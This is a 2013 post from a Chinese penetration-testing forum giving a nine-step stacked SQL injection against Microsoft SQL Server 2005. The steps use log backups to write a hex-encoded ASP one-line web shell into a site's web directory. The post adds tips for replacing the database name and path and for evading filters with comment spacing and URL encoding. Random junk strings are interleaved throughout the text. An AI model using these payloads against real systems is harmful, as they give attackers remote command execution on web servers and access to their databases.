中国网络渗透测试联盟

标题: mssql2005 DB权限导出一句话 [打印本页]
作者: admin    时间: 2013-7-16 20:32
标题: mssql2005 DB权限导出一句话
网站路径也搞到了,本想使用差异备份,在数据库日志中插入一句话,然后备份到网站目录下拿shell的,估计是用户没有备份数据库的权限,但使用MSSQL2000的备份方法根本行不通,后来才想到MSSQL2005的备份和MSSQL2000有点不同。
  r1 |" ]% j; V" {, V1 S/ i
* \, z0 m4 C; |, T9 d
1 p, X1 }2 Z0 M; A/ ~% v后来在网上搜半天没有找到具体的备份语句,后来在群求助,小冰才发我了具体的利用语句,但贴出来的文章貌似没啥水准,大家都知道手工差异备份是自己需要修改数据库名和网站路径的,但那个文章中对语句没有做任何解释,无奈之下我只好自己尝试了,虽然测试的网站没有成功拿下shell,单语句是没有错误的,我在本地的MSSQL2005的查询分析器中测试通过了,再次特将语句整理出来分享个大家,并做好详细的解释说明,首先来贴出语句。
$ `' Y; d7 \4 B- Y 3 G( F+ S2 _, V5 n- X
第一步
) L$ f, h* R' q" a  F;alter/**/database/**/[Hospital]/**/set/**/recovery/**/full-- ( Q9 l7 P! ~# D" \

! M4 q1 q8 z; J, C" N! `/ Q3 Y第二步: " [& u( |; V0 K
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[Hospital]/**/to/**/disk=@d/**/with/**/init-- & s$ N& U# c, }; s( D# w
. V8 x$ ]$ N: @0 k2 J# `3 u: B
第三步 1 P3 w8 T1 E7 @. U' P$ Z" w
;drop/**/table/**/[itpro]--
5 I9 {/ Q9 v1 q% t6 m5 }
7 I9 N" w( r% j6 b) D- U第四步 " {" `0 \$ E, A0 [
;create/**/table/**/[itpro]([a]/**/image)-- - X0 m9 c! Q( w9 K  S
& R1 s" c0 a+ o5 |! U+ s
第五步 3 Y, U* M1 m, W( ]) P4 p7 a5 A
;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
" m5 T7 ~8 j6 s1 q0 ~; D% r  c7 p" |
: F" k9 o7 l- {第六步 % ~" H$ a6 g/ [5 ^+ C
;insert/**/into/**/[itpro]([a])/**/values(0x3C25657865637574652872657175657374282261222929253EDA)-- . x2 `$ X1 o1 I: ^

9 f" N; l0 D. W1 k第七步
) v' x; Y; l8 `2 b2 P: i;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x65003A005C007700650062005C007A002E00610073007000/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
/ l5 H; r! P3 _6 Y8 ?9 K# v0 V' R
) E' F  m9 Y; L1 t第八步 $ F4 q/ E; |! _+ N1 c8 z. Z
;drop/**/table/**/[itpro]--
. H: c* h, L' T3 Y 6 u. l' X/ S: Z. z: K
第九步
5 Y+ `2 |% b% g# Z. k;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[Hospital]/**/to/**/disk=@d/**/with/**/init--
; T# \/ h3 q4 J/ y. V/ \# h
6 H# y2 q3 `7 P4 k9 [8 G其中红色的“Hospital”既是数据库名,这个要根据自己的情况来修改,然后黄色的“0x3C25657865637574652872657175657374282261222929253EDA”是一句话“<%eval request("a")%>”的内容,橙色的“0x65003A005C007700650062005C007A002E00610073007000”为备份的路径“e:\web\z.asp”,都是使用的SQL_En的格式,另外第三步大可以不需要!他是删除itpro的表,如果第一次的话这个表是不存在的,就会提示无权限的信息。另外在语句“disk=@d”的地方可以将“=”更换成“%3D”,就是使用URL编码。“/**/”就等于空格了,这个大家在学习注入的过程中应该了解,也可以更换成“%20”。
, j/ J6 y* ]- d/ R( |



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2